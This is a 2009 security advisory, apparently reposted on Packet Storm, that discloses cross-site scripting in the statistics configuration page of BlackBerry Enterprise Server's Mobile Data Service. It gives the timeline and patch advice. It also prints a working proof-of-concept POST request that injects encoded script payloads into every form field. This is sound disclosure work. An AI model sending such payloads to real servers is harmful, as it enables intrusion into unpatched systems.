Blackberry Mobile Data Service XSS

2009-04-17T00:00:00
ID PACKETSTORM:76782
Type packetstorm
Reporter Michael Thumann
Modified 2009-04-17T00:00:00

Description

                                        
                                            `ERNW Security Advisory 01-2009  
  
XSS in Blackberries Mobile Data Service Connection Service  
  
Author: Michael Thumann <mthumann[at]ernw.de>  
  
1. Summary  
The Blackberry Mobile Data Service Connection is vulnerable to  
several XSS attacks in the "Customize Statistics Page".  
  
2. CVSS V2 Base Score : 3.5 (based on vendor rating)  
  
3. Products affected  
Blackberry Enterprise Server: all versions prior to 4.1.6 MR4  
  
4. Patch Availability : A patch is available from the vendor.  
  
5. Details   
Injecting scripts (containing standard and encoded XSS attacks) into  
all the fields of the "customize statitics page" reveals that none  
of the fields are properly validated for malicious input and the  
output isn't sanitized.  
  
6. Solution   
Update the affected products to the actual version.  
  
7. Time-Line   
16 Feb 2009: Discovery of the vulnerability   
02 Mar 2009: Vulnerability reported to vendor   
02 Mar 2009: Answer from vendor   
16 Apr 2009: Patch available   
16 Apr 2009: Public Disclosure  
  
8. Exploit   
POST /admin/statistics/ConfigureStatistics HTTP/1.0   
Cookie: JSESSIONID=....   
Content-Length: 753   
Accept: */*   
Accept-Language: en-US  
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)   
Host: ...  
Content-Type: application/x-www-form-urlencoded   
Referer: http://x:8080/admin/statistics/ConfigureStatistics  
  
customDate=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%3E&  
interval=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%3E&  
lastCustomInterval=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%3E  
&lastIntervalLength=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%  
3E&nextCustomInterval=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript  
%3E&nextIntervalLength=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%  
2Fscript%3E&action=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%3E  
&delIntervalIndex=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%3E&  
addStatIndex=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%3E&  
delStatIndex=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%3E&  
referenceTime=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%3E  
  
9. Thanks  
We would like to thank the guys from Blackberry for working  
together on this issue in a professional and responsible way.  
  
10. Disclaimer   
The informations in this advisory are provided "AS IS"  
without warranty of any kind. In no event shall the authors be liable  
for any damages whatsoever including direct, indirect, incidental,  
consequential, loss of business profits or special damages due to the  
misuse of any information provided in this advisory.  
  
`